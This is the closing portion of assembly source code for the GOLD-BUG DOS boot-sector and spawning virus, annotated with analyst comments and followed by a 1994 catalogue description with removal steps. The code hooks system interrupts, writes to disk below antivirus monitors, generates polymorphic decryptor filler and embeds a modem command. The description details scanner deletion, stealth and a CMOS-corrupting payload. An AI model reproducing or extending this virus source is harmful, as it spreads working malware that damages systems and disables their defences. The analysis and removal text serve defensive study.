mov bx,VIRGIN_INT_13_B-SET_INT_OFFSET
call set_interrupt
mov bl,low(VIRGIN_INT_13_A-SET_INT_OFFSET)
call set_interrupt
mov ah,high(WRITE_A_SECTOR)
interrupt_2f endp
;-----------------------------------------------------------------------------
; get_set_part: sector-transfer helper used by the resident code.
; In:  AX = INT 13h function/count supplied by the caller (the only visible
;      caller, the tail of interrupt_2f above, loads AH with the write
;      function first); CX = INT 13h cylinder/sector word, advanced by one below.
; Out: all general registers are restored by popa, so the BIOS status in AH
;      is discarded; only CF (untouched by pop es / popa) can reach the
;      caller, and only from the second INT 13h call.
; Note for analysts: the first transfer is issued through interrupt number
;      NEW_INT_13_LOOP -- the slot that set_both_ints / boot_load load with the
;      saved BIOS INT 13h vector -- i.e. below any INT 13h hooks installed by
;      resident monitors; the read afterwards goes through the normal chain.
get_set_part proc near
pusha
push es
mov bx,SCRATCH_AREA             ; ES:BX = SCRATCH_AREA:SCRATCH_AREA (BX keeps the segment value)
mov es,bx
mov dx,HD_0_HEAD_0              ; DH/DL = head/drive; the name implies first hard disk, head 0
inc cx                          ; next sector (CL low bits = sector number)
int NEW_INT_13_LOOP             ; transfer via the private copy of the original INT 13h vector
mov ax,READ_A_SECTOR
int DISK_INT                    ; read the same sector back through the public INT 13h chain
pop es
popa
another_return: ret             ; shared exit; also the target of `jb another_return` in interrupt_10
get_set_part endp
;-----------------------------------------------------------------------------
; return_to_2f: exit path of the INT 2Fh hook (interrupt_2f, above) -- undo the
; entry pushes and chain to the original handler.  It is entered by jmp, not
; call, so the pops below must mirror exactly the push es / push ds / pusha
; sequence performed at the hook's entry (not visible in this excerpt).
return_to_2f proc near
pop es
pop ds
popa
jmp far ptr original_2f_jmp     ; far jump to the saved INT 2Fh handler -- presumably a
                                ;   jmp-far stub patched by set_interrupt, like old_int_10_21
return_to_2f endp
;-----------------------------------------------------------------------------
; interrupt_10: the hook installed on INT 10h (video) while the virus is parked
; in video memory.  Every video call is used as a poll: once DOS HMA space
; (DOS=HIGH) is available the code relocates itself there, hooks INT 13h,
; INT 2Fh and INT 21h, and finally points INT 10h back at its original handler.
; Control-flow notes for the analyst:
;   * int_10_start pushes the offset of a_return as a fake return address.  The
;     routine never executes ret itself: it either jumps to the shared ret at
;     another_return or falls off its end into get_n_set_int (next proc); either
;     ret pops that offset and resumes at a_return (outside this excerpt), which
;     must therefore pop es / pop ds / popa / popf to mirror the entry pushes.
;   * from_com_code is a second entry point used by boot_load via a near call
;     (skipping the pushes); on that path the same ret returns to boot_load.
;   * CX is assumed to be 0 below (presumably left by the rep-move inside
;     full_move_w_di -- confirm).  With CX=0 the stubs at LOW_JMP_10/LOW_JMP_21
;     live in segment 0, inside the interrupt vector table, which is where the
;     description below says part of the virus stays resident.
interrupt_10 proc far
int_10_start: pushf
pusha
push ds
push es
push offset a_return+RELATIVE_OFFSET   ; fake return address (see header)
from_com_code: xor bx,bx
mov ds,bx                       ; DS = 0: interrupt vector table
or ah,ah
jz set_10_back                  ; AH=0 (BIOS set video mode): stop polling, restore INT 10h
mov ax,QUERY_FREE_HMA
int MULTIPLEX_INT               ; DOS 5+ HMA services on INT 2Fh (by their usual names
                                ;   AX=4A01h query / AX=4A02h allocate -- confirm equates);
                                ;   the query reports the free size in BX
cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE)
jb another_return               ; not enough HMA yet: return, stay hooked, poll on the next call
mov ax,ALLOCATE_HMA
int MULTIPLEX_INT               ; allocate; presumably ES:DI -> the new block (4A02h convention)
clc                             ; CF=0 is an input to full_move_w_di (meaning not visible here)
call full_move_w_di             ; copy the body to ES:DI (the HMA block); routine not shown
mov dx,offset int_13_start+RELATIVE_OFFSET
call set_13_chain               ; hook INT 13h (routine not in this excerpt)
mov bx,VIRGIN_INT_2F-SET_INT_OFFSET
mov dx,offset interrupt_2f+RELATIVE_OFFSET
call set_interrupt              ; DS is still 0: store ES:DX (HMA:interrupt_2f) into the
                                ;   vector/stub slot at 0000:VIRGIN_INT_2F -- the INT 2Fh hook
cmp word ptr ds:[LOW_JMP_10],cx
je set_10_back                  ; word at 0000:LOW_JMP_10 equals CX: skip the INT 21h setup
push es                         ; ES = resident (HMA) segment, saved twice: one copy becomes
push es                         ;   DS below, the other is restored after the DOS call
mov di,DOS_INT_ADDR             ; DI -> INT 21h entry in the IVT (DS=0)
mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE     ; +1 skips the CS: override of `les dx,cs:[di]`, so this loads
                                ;   ES:DX = current INT 21h vector from 0000:[di] and stores it
                                ;   into vector slot INT_21_IS_NOW: the original DOS entry is
                                ;   relocated to a spare interrupt number
pop ds                          ; DS = resident segment
mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE
call set_interrupt              ; also save the original INT 21h vector inside the HMA copy at
                                ;   old_int_10_21+1 (the operand of a jmp-far stub, presumably)
mov ds,cx                       ; DS = CX (presumably 0, see header)
mov ax,DOS_SET_INT+DOS_INT      ; AH=25h set vector, AL=21h (DOS_INT)
mov dx,LOW_JMP_21
int INT_21_IS_NOW               ; ask DOS itself (through its relocated entry) to point INT 21h
                                ;   at DS:LOW_JMP_21 -- this vector change is a normal-looking
                                ;   DOS call rather than a direct IVT write
pop es                          ; ES = resident segment again
mov bx,dx                       ; BX -> the stub location LOW_JMP_21 (DS:[bx] is the new INT 21h target)
mov dx,offset interrupt_21+RELATIVE_OFFSET
mov word ptr ds:[bx],0b450h     ; bytes 50h B4h          : push ax / mov ah,..
mov word ptr ds:[bx+TWO_BYTES],0cd19h                 ; 19h CDh : ..19h    / int ..
mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW  ; nn 58h  : ..nn     / pop ax
                                ; i.e. the stub reads: push ax / mov ah,19h / int INT_21_IS_NOW /
                                ; pop ax -- a harmless DOS call (AH=19h, get default drive) into
                                ; the relocated entry, then the far jump written next; why the
                                ; extra call is made is not evident from this excerpt
call set_int_10_21              ; append `jmp far` ES:DX (resident:interrupt_21) after the stub
set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
                                ; no ret here: falls through into get_n_set_int, which loads
                                ; ES:DX from cs:[di] -- note CS (the running copy) where the
                                ; store above used DS (the HMA copy), so the one field
                                ; old_int_10_21 presumably holds the saved INT 10h vector in
                                ; this copy and the saved INT 21h vector in the HMA copy -- and
                                ; writes it into the stub at LOW_JMP_10, i.e. presumably
                                ; re-targets the INT 10h stub at the original handler (unhook).
                                ; Its ret then pops the fake return address -> a_return.
interrupt_10 endp
;-----------------------------------------------------------------------------
; get_n_set_int / set_int_10_21 / set_interrupt: one routine, three entry points,
; sharing the single ret at the end.
;   get_n_set_int          ES:DX <- dword at cs:[di], then fall into set_interrupt.
;   get_n_set_int+ONE_BYTE (the form every visible caller uses) skips the CS:
;                          segment-override prefix of the first instruction,
;                          turning it into `les dx,[di]` = a load from DS:[di];
;                          with DS=0 that reads a vector straight out of the IVT.
;   set_int_10_21          additionally writes the FAR_JUMP opcode byte at
;                          ds:[bx+FAR_JUMP_OFFSET] before storing the address,
;                          building a `jmp far seg:off` stub in place.
;   set_interrupt          stores DX at ds:[bx+SET_INT_OFFSET] and ES at
;                          ds:[bx+CHANGE_SEG_OFF].  Callers pass
;                          BX = N*ADDR_MUL-SET_INT_OFFSET so that, with DS=0, this
;                          overwrites vector N (offset, then segment) directly in
;                          the interrupt vector table, bypassing DOS INT 21h/25h.
; In:  DI, BX, DX, ES, DS as described above.  Clobbers: DX, ES (load entries only).
; Note for analysts: the same code both hooks vectors and patches jmp-far stubs
; inside the body; the constant SET_INT_OFFSET is what makes the IVT-slot
; arithmetic and the stub layout coincide.
get_n_set_int proc near
les dx,dword ptr cs:[di]        ; encodes 2Eh C4h 15h -- the 2Eh prefix is what +ONE_BYTE skips
jmp short set_interrupt
set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP
set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx
mov word ptr ds:[bx+CHANGE_SEG_OFF],es
ret
get_n_set_int endp
;-----------------------------------------------------------------------------
IF MULTIPARTITE
; set_both_ints (MULTIPARTITE build only): point two vectors at the same handler.
; In:  DS = 0 (IVT), DI -> the 4-byte far pointer to copy (read via DS:[di]).
; Effect: vector NEW_INT_13_LOOP and vector BIOS_INT_13 both receive that
; pointer -- the BIOS INT 13h entry is kept under a spare interrupt number so
; the resident code can call it below any other hooks (int NEW_INT_13_LOOP in
; get_set_part) while INT 13h itself is set as well.
; Caveat: the second store reloads only BL, so it relies on
; (NEW_INT_13_LOOP*ADDR_MUL-SET_INT_OFFSET) having a zero high byte, i.e. both
; IVT slot addresses lying below 100h.
set_both_ints proc near
mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE     ; ES:DX <- [di] (DS-relative form), stored into slot NEW_INT_13_LOOP
mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET
jmp short set_interrupt         ; same ES:DX into slot BIOS_INT_13; its ret returns to our caller
set_both_ints endp
ENDIF
;-----------------------------------------------------------------------------
IF EXECUTE_SPAWNED
; exec_table: three byte values named after the DOS EXEC (INT 21h/4Bh)
; parameter-block fields (command tail, FCB1, FCB2); presumably the low bytes
; of the PSP offsets used to build that block when the original program is
; launched -- confirm against the equates (not in this excerpt).
exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB
ENDIF
;-----------------------------------------------------------------------------
IF MODEM_CODE
; Modem command string at a fixed offset inside the partition-sector image.
; It is stored back to front: read in reverse it is the Hayes command
; "ATMLS0=7O1", where S0=7 enables auto-answer after 7 rings -- matching the
; symptom listed in the description below; the sender presumably walks the
; buffer backwards.
org PART_OFFSET+001f3h
string db CR,'1O7=0SLMTA'
ENDIF
;-----------------------------------------------------------------------------
; 55AAh boot-sector signature in the last two bytes of the 512-byte sector image
; (little-endian word 0AA55h).  The org directives make this region a byte-exact
; template of the infected partition sector: nothing that emits bytes may be
; added here.
org PART_OFFSET+SECTOR_SIZE-TWO_BYTES
partition_sig dw 0aa55h
;-----------------------------------------------------------------------------
; Two bytes past the end of the sector image: the companion virus's file name,
; "DA'BOYS.COM" (027h is the apostrophe), NUL-terminated -- see the description.
org PART_OFFSET+SECTOR_SIZE+TWO_BYTES
file_name db 'DA',027h,'BOYS.COM',NULL
;-----------------------------------------------------------------------------
; PARAMETER_TABLE: 15 zero bytes (7 words + 1 byte) reserved at a fixed
; location; the field layout is not visible in this excerpt.
org PARAMETER_TABLE
dw NULL,NULL,NULL,NULL,NULL,NULL,NULL
db NULL
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
; boot_load (non-MULTIPARTITE build): entry path when the virus is started as
; a program rather than from a boot/partition sector.  It copies itself, makes
; sure a private copy of the saved BIOS INT 13h vector exists under interrupt
; NEW_INT_13_LOOP, runs the installer half of interrupt_10 as a subroutine (that
; code decides whether to go resident) and then terminates the process.
; Register assumption: CX presumably 0 after full_move_w_si (a rep-move), so
; `mov ds,cx` selects segment 0, the interrupt vector table -- confirm.
boot_load proc near
push cs
pop es                          ; ES = CS: destination segment for the copy
call full_move_w_si             ; copy routine (not in this excerpt)
mov ds,cx                       ; DS = CX (presumably 0 -> IVT)
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_intcd              ; offset word of vector NEW_INT_13_LOOP already differs (set): skip
lds dx,dword ptr ds:[VIRGIN_INT_13_B]  ; DS:DX <- far pointer kept at 0000:VIRGIN_INT_13_B,
                                       ;   presumably the saved original INT 13h vector
mov ax,DOS_SET_INT+NEW_INT_13_LOOP     ; AH=25h: DOS set-vector for INT NEW_INT_13_LOOP
int DOS_INT                     ; done through DOS here; the resident code later writes the IVT directly
dont_set_intcd: mov ah,high(GET_DEFAULT_DR)
int DOS_INT                     ; AH=19h get default drive -> AL (how AL is used is not visible here)
call from_com_code+RELATIVE_OFFSET ; near call into interrupt_10's install path, skipping its
                                ;   register pushes; its ret (another_return or set_interrupt)
                                ;   comes back here
mov ax,TERMINATE_W_ERR
int DOS_INT                     ; presumably AH=4Ch: exit the host process
boot_load endp
ENDIF
;-----------------------------------------------------------------------------
IF POLYMORPHIC
; load_it (POLYMORPHIC build): randomise the decryptor of the companion file
; being generated, then continue at com_start.
; In:  DS:SI -> the output file image; the two constant bytes FILE_SIGNATURE are
;      written at [si] and FIRST_UNDO_OFF at [si+2].  BX is preserved.
; Randomness: the 8253/8254 PIT is read (port 43h, command 0 = latch counter 0,
;      then low/high byte from port 40h) with interrupts disabled so the IRQ0
;      handler cannot interleave its own accesses.  Bits 1-4 of the count pick
;      one of 16 two-byte instructions from two_byte_table; bits 5-9 pick one
;      of 32 one-byte instructions from one_byte_table.  (The description below
;      quotes 128/512 variation counts; only this 16x32 selection is visible here.)
; Self-modification: the chosen one-byte opcode, XORed with the INC BL opcode,
;      is stored into the virus's own code at swap_incbx_bl+3 -- presumably so
;      the resident routine and the emitted filler agree; the exact effect
;      depends on the instruction at swap_incbx_bl, which is not shown.
; Clobbers: AX, CL, flags.
load_it proc near
mov word ptr ds:[si],FILE_SIGNATURE        ; the only two constant bytes of a spawned file
mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF
push bx
xor ax,ax
cli
out 043h,al                     ; PIT control word 0: latch counter 0
in al,040h                      ; counter 0 low byte
mov ah,al
in al,040h                      ; counter 0 high byte (AX now holds the count byte-swapped)
sti
push ax
and ax,0001eh                   ; bits 1..4 -> even offset 0..30 into two_byte_table
mov bx,ax
mov ax,word ptr ds:[bx+two_byte_table]
mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax   ; emit the two-byte filler into the image
org $-REMOVE_NOP                ; back up the location counter: drops a padding byte the
                                ;   assembler emitted for the forward reference above (presumably a NOP)
pop ax
and ax,003e0h                   ; bits 5..9 ->
mov cl,FIVE_BITS
shr ax,cl                       ;   index 0..31 into one_byte_table
mov bx,ax
mov al,byte ptr ds:[bx+one_byte_table]
xor al,low(INC_BL)              ; pre-XOR with the INC BL opcode (see header)
mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al   ; self-modifying store into own code
pop bx
jmp com_start
load_it endp
;-----------------------------------------------------------------------------
; two_byte_table: 16 two-byte instructions used as DATA, never executed here --
; load_it indexes this table with an even offset 0..30 and copies one entry
; into the generated file as polymorphic filler.  Each entry assembles to
; exactly two bytes (ALU op with imm8, `les` from [si], test, prefixed stc);
; none of them writes BX, SI or SP -- presumably the registers the decryptor
; relies on (not visible here), though the `les` forms do clobber ES.
; Do not insert, remove or reorder entries: the table must stay exactly
; 32 bytes with every entry 2 bytes long.
two_byte_table: mov al,0b2h     ; B0 B2
xor al,0b4h                     ; 34 B4
and al,0d4h                     ; 24 D4
les ax,dword ptr ds:[si]        ; C4 04
les cx,dword ptr ds:[si]        ; C4 0C
les bp,dword ptr ds:[si]        ; C4 2C
adc al,0d4h                     ; 14 D4
and al,084h                     ; 24 84
adc al,084h                     ; 14 84
adc al,024h                     ; 14 24
add al,084h                     ; 04 84
add al,014h                     ; 04 14
add al,024h                     ; 04 24
test dl,ah                      ; 84 E2
repz stc                        ; F3 F9
repnz stc                       ; F2 F9
;-----------------------------------------------------------------------------
; one_byte_table: 32 single-byte opcodes used as DATA -- load_it indexes it with
; 0..31 and patches the chosen byte (XORed with INC BL) into its own code.
; Every entry must assemble to exactly one byte; `int SINGLE_BYTE_INT` relies on
; the equate being 3 so the assembler emits the one-byte CCh form (INT 3, the
; debugger breakpoint -- cf. the "double decryption ... INT 3" remark in the
; description below).  No entry writes BX, SI or SP; `repnz`/`repz` are bare
; prefix bytes (F2/F3) that attach to whatever instruction follows them in the
; generated code.  Do not insert, remove or reorder entries.
one_byte_table: int SINGLE_BYTE_INT   ; CC (only if SINGLE_BYTE_INT = 3)
into                            ; CE
daa                             ; 27
das                             ; 2F
aaa                             ; 37
aas                             ; 3F
inc ax                          ; 40
inc cx                          ; 41
inc dx                          ; 42
inc bp                          ; 45
inc di                          ; 47
dec ax                          ; 48
dec cx                          ; 49
dec dx                          ; 4A
dec bp                          ; 4D
dec di                          ; 4F
nop                             ; 90
xchg ax,cx                      ; 91
xchg ax,dx                      ; 92
xchg ax,bp                      ; 95
xchg ax,di                      ; 97
cbw                             ; 98
cwd                             ; 99
lahf                            ; 9F
scasb                           ; AE
scasw                           ; AF
xlat                            ; D7
repnz                           ; F2 (bare prefix)
repz                            ; F3 (bare prefix)
cmc                             ; F5
clc                             ; F8
stc                             ; F9
ENDIF
;-----------------------------------------------------------------------------
gold_bug endp
cseg ends
end com_code
;-----------------------------------------------------------------------------
Virus Name: GOLD-BUG
Aliases: AU, GOLD, GOLD-FEVER, GOLD-MINE
V Status: New, Research
Discovery: January, 1994
Symptoms: CMOS checksum failure; Creates files with no extension; Modem
answers on 7th ring; BSC but it is hidden; Most virus scanners
fail to run or are deleted; CHKLIST.??? files deleted.
Origin: USA
Eff Length: 1,024 Bytes
Type Code: SBERaRbReX - Spawning Color Video Resident and Extended HMA
Memory Resident Boot-Sector and Master-Sector Infector
Detection Method: None
Removal Instructions: See Below
General Comments:
GOLD-BUG is a memory-resident multipartite polymorphic stealthing
boot-sector spawning anti-antivirus virus that works with DOS 5 and
DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the
GOLD-BUG virus is run, it determines if it is running on an 80186 or
better, if not it will terminate and not install. If it is on an
80186 or better it will copy itself to the partition table of the hard
disk and remain resident in memory in the HMA (High Memory Area) only
if the HMA is available, ie. DOS=HIGH in the CONFIG.SYS file else no
infection will occur. The old partition table is moved to sector 14
and the remainder of the virus code is copied to sector 13. The virus
then executes the spawned associated file if present. INT 13 and
INT 2F are hooked into at this time but not INT 21. The spawning
feature of this virus is not active now.
When the computer is rebooted, the virus goes memory resident in the
color video memory. Also at this time the GOLD-BUG virus removes
itself from the partition table and restores the old one back. Unlike
other boot-sector infectors, it does not use the top of memory to
store the code. CHKDSK does not show a decrease in available memory.
At this time it only hooks INT 10 and monitors when the HMA becomes
available. Once DOS moves into the HMA, then GOLD-BUG moves into the
HMA at address FFFF:FB00 to FFFF:FFFF. If the HMA never becomes
available, ie. DOS loaded LOW or the F5 key hit in DOS 6 to bypass the
CONFIG.SYS, then the virus clears itself from the system memory when
the computer changes into graphics mode. If it moves to the HMA, it
hooks INT 13, INT 21 and INT 2F and then rewrites itself back to the
partition table. The GOLD-BUG virus also has some code that stays
resident in the interrupt vector table to always make the HMA
available to the virus. The full features of the virus are now
active.
The GOLD-BUG virus will infect the boot sector of 1.2M diskettes.
The virus copies itself to the boot sector of the diskette and moves
a copy of the boot sector to sector 28 and the remainder of the code
is copied to sector 27. These are the last 2 sectors of the 1.2M disk
root directory. If there are file entries on sector 27 or 28 it will
not overwrite them with the virus code. It will infect 1.2M disks in
drive A: or B:. If a clean boot disk is booted from drive A: and you
try to access C: you will get an invalid drive specification.
The boot-sector infection is somewhat unique. If the computer is
booted with a disk that contains the GOLD-BUG virus, it will remain in
video memory until the HMA is available and then infect the hard disk.
Also at this time, it will remove itself from the 1.2M disk. The
virus will never infect this disk again. It makes tracking where you
got the virus from difficult in that your original infected disk is
not infected anymore.
If an .EXE file less than 64K and greater than 1.5K is executed,
GOLD-BUG will randomly decide to spawn a copy of it. The .EXE file is
renamed to the same file name with no extension, ie. CHKDSK.EXE
becomes CHKDSK. The original file attributes are then changed to
SYSTEM. An .EXE file with the same name is created. This .EXE file
has the same length, file date and attributes as the original .EXE
file. This spawning process will not make a copy on a diskette
because it might be write protected and be detected; but it will make
a spawn .EXE file on a network drive. When a spawned file is created,
CHKLIST.??? of the current directory is also deleted. The .EXE file
that is created is actually a .COM file; it has no .EXE header.
The GOLD-BUG virus is very specific as to what type of .EXE files it
will spawn copies. It will not spawn any Windows .EXE files or any
other .EXE files that use the new extended .EXE header except those
that use the PKLITE extended .EXE header. This way all Windows
programs will continue to run and the virus will still be undetected.
The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates
only has 2 bytes that remain constant. It can mutate into 128
different decryption patterns. It uses a double decryption technique
that involves INT 3 that makes it very difficult to decrypt using a
debugger. The assembly code allowed for 512 different front-end
decrypters. Each of these can mutate 128 different ways.
The GOLD-BUG virus incorporates an extensive stealthing technique. Any
time the hard disk partition table or boot sector of an infected
diskette is examined, the copy of the partition table or boot sector
is returned. If a spawned .EXE file is opened to be read or executed;
the GOLD-BUG virus will redirect to the original file. Windows 3.1
will detect a resident boot-sector virus if the "Use 32 Bit Access" is
enabled on the "Virtual Memory" option. GOLD-BUG will disconnect
itself from the INT 13 chain when Windows installs and reconnect when
Windows uninstalls to avoid being detected. When Windows starts, the
GOLD-BUG virus will copy the original hard disk partition table back.
When Windows ends, the GOLD-BUG virus will reinfect the partition
table.
The GOLD-BUG virus also has an extensive anti-antivirus routine. It
can install itself with programs like VSAFE.COM and DISKMON.EXE
resident that monitor changes to the computer that are common for
viruses. It writes to the disk using the original BIOS INT 13 and not
the INT 13 chain that these types of programs have hooked into. It
hooks into the bottom of the interrupt chain rather than changing and
hooking interrupts; very similar to the tunneling technique. If the
GOLD-BUG virus is resident in memory, any attempts to run most virus
scanners will be aborted. GOLD-BUG stops any large .EXE file
(greater than 64k) with the last two letters of "AN" to "AZ". It will
stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE,
etc., etc. The SCAN program will either be deleted or an execution
error will return. Also, GOLD-BUG will cause a CMOS checksum failure
to happen next time the system boots. GOLD-BUG also erases
"CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an
internal checksum on themselves will not detect any changes. The
Thunder Byte Antivirus programs contain a partition table program that
claims it can detect all partition table viruses. GOLD-BUG rides
right through the ThunderByte partition virus checker.
The GOLD-BUG virus detects a modem. If you received an incoming call
on the modem line, GOLD-BUG will output a string that will set the
modem to answer on the seventh ring.
If a program tries to erase the infected .EXE file, the original
program and not the infected .EXE file is erased.
The text strings "AU", "1O7=0SLMTA", and "CHKLIST????" appear in the
decrypted code. The virus gets its name from "AU", the chemical
element "GOLD". The text string "CHKLIST????" is actually executable
code.
The GOLD-BUG virus has two companion viruses that it works with. The
DA'BOYS virus is also a boot-sector infector. It is possible to have
a diskette with two boot-sector viruses. GOLD-BUG hides the presence
of the DA'BOYS virus from the Windows 3.1 startup routine. GOLD-BUG
removes the DA'BOYS virus from the INT 13 chain at the start of
Windows and restores it when Windows ends. The GOLD-BUG virus works
with the XYZ virus; it reserves the space FFFF:F900 to FFFF:FAFF in
the HMA for the XYZ virus so it can load as well.
To remove the GOLD-BUG virus, change DOS=HIGH to DOS=LOW in the
CONFIG.SYS, then reboot. Once the system comes up again, reboot from
a clean boot disk. The virus has now removed itself from the
partition table and memory. Note that this step depends on the virus's
own clean-up code having run; verify the partition sector from the clean
boot disk instead of taking it on trust (the original partition table
was moved to sector 14 at infection time, see above). With the ATTRIB
command check for files
with the SYSTEM bit set that don't have any extension. Delete the
.EXE file associated with the SYSTEM file. Using ATTRIB remove the
SYSTEM attribute. Rename the file with no extension to an .EXE file.
Format each diskette or run SYS to remove the virus from the boot
sector of each 1.2M disk. Any spawned .EXE files copied to diskette
need to be deleted.
Several variations of this virus can exist. The assembly code allowed
for 14 features to be turned on or off: Delete Scanners, Check for
8088, Infect at Random, Deflect Delete, CMOS Bomb, File Reading
Stealth, Same File Date, Double Decryption, Execute Spawned, Modem
Code, Anti-Antivirus, Polymorphic, Multipartite and 720K or 1.2M
Diskette Infection. Some of these features can be disabled and more
code added to change the characteristics of this virus.